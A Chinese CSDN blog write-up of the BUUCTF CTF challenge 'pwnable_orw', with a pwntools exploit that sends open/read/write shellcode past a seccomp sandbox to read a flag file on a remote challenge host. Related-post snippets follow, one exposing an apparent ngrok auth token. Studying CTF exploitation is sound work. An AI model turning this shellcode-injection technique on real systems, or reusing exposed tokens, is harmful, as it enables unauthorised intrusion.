BUUCTF-pwnable_orw-WP

已于 2023-02-12 17:06:30 修改
阅读量262 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: pwn 安全
于 2023-02-12 17:06:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/128981667
版权

1.checksec

32位,canary保护 

2.IDA

 很明显,这是一道sandbox题目

orw_seccomp /   _prctl都是判断sandbox题目的标志

pwn题中的沙盒一般都会限制execve的系统调用,所以one_gadget和system不好调用,只能采取open/read/write的组合方式来读取flag。    

有些题目可能还会将上面三个系统调用去掉一个,进一步限制我们获取flag。

利用工具---seccomp-tools

检查禁用了哪些系统调用以及允许哪些系统调用

使用命令:

seccomp-tools dump ./文件名

 可以看到,本题允许了orw三个系统调用,是最基础的一类题型了                               

 所以直接open打开flag,read读入flag,write输出flag

3.EXP

from pwn import *

r = remote('node4.buuoj.cn',29475)

context.log_level = 'debug'
elf = ELF('orw')

shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('eax','esp',100)
shellcode += shellcraft.write(1,'esp',100)
shellcode = asm(shellcode)

r.sendline(shellcode)

r.interactive()

没有开NX保护,直接用shellcode就行

Rt1Text
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
BUUCTF pwnable_orw
BengDouLove的博客
04-12 515
这道题又是一道seccomp,,这个orw_seccomp函数里面说的傻我看不懂。。。 反正根据套路肯定还是不能用system,,还是通过 open,read,write,来泄露flag文件 写这种shellcode写的方法一个是直接汇编 或者 可以用pwntools里面带的shellcraft pwntools官方文档 其他的没啥可说的,看一下代码 shellcraft: #cod...
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1296
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
【CTF】【PWNorw
m0_50819561的博客
10-09 1329
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
pwn】[FSCTF 2023]Fi3h --orw利用,沙箱检测
question55的博客
11-19 183
【代码】【pwn】[FSCTF 2023]Fi3h --orw利用,沙箱检测。
buuctf pwnable_orw
qq_42728977的博客
04-12 331
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
[BUUCTF-pwn]——pwnable_orw   (ORW
Y_peak的博客
03-16 1147
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
NetApp_7-mode常用指令
11-17
- 使用`exportfs -i -orw=host1 /vol/vol1/home`来为特定主机提供读写权限。 ### 进阶操作 - 跨域、子网和NetGroup的资源共享。 - 收集NFS性能统计信息。 - 进行NFS性能调优。 - 故障排除技巧。 ### NIC 设置 - **...
aserteee:我的GitHub个人资料的配置文件
03-22
职位: 作业:Create_Windows_2019_Azure_...脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O AzureNgrokAutoRegion.bat显示名: '运行RDP哈克在Azure管道'
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
Latency and Bandwidth Impact on GPU Systems - 2008 (ms-proj-gpgpu-latency-bandwidth)-计算机科学
04-22
orw eg ian Un ive rsit yo fS cie nce an dT ech no log yF acu lty of Info rma tio nT ech no log y, Ma the ma tics an dE lect rica l En gin ee rin gD ep art me nt of Co mp ute ra nd In form ati...
字与、字或、字异或plc逻辑运算指令.doc
07-02
在可编程逻辑控制器(PLC)编程中,字与(ANDW)、字或(ORW)、字异或(XORW)是三种常用的逻辑运算指令。这些指令用于处理二进制数据,通过对两个输入字进行位操作来实现特定的功能需求。本文将详细介绍这三种指令...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 179
BUUCTF 做题练习
BUUCTFpwnable_orw
qq_44768749的博客
08-27 1540
BUUCTFpwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1885
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
BUUCTF pwnable_orw WP
weixin_44645415的博客
08-18 330
限制系统调用&&shellcode 1,文件分析 checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 有canary保护,但是又有存在RWX权限的段,可以考虑写入shellcod
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 473
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 393
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 309
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
et-kernel中tk_wai_flg参数的作用
06-09
如果 wfmode 的值为 TWF_ORW,则当任意一个指定的标志位被置位或清除时,等待就会结束。如果 wfmode 的值为 TWF_ANDW,则只有当所有指定的标志位都被置位或清除时,等待才会结束。 总之,这三个参数共同作用,让 tk...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值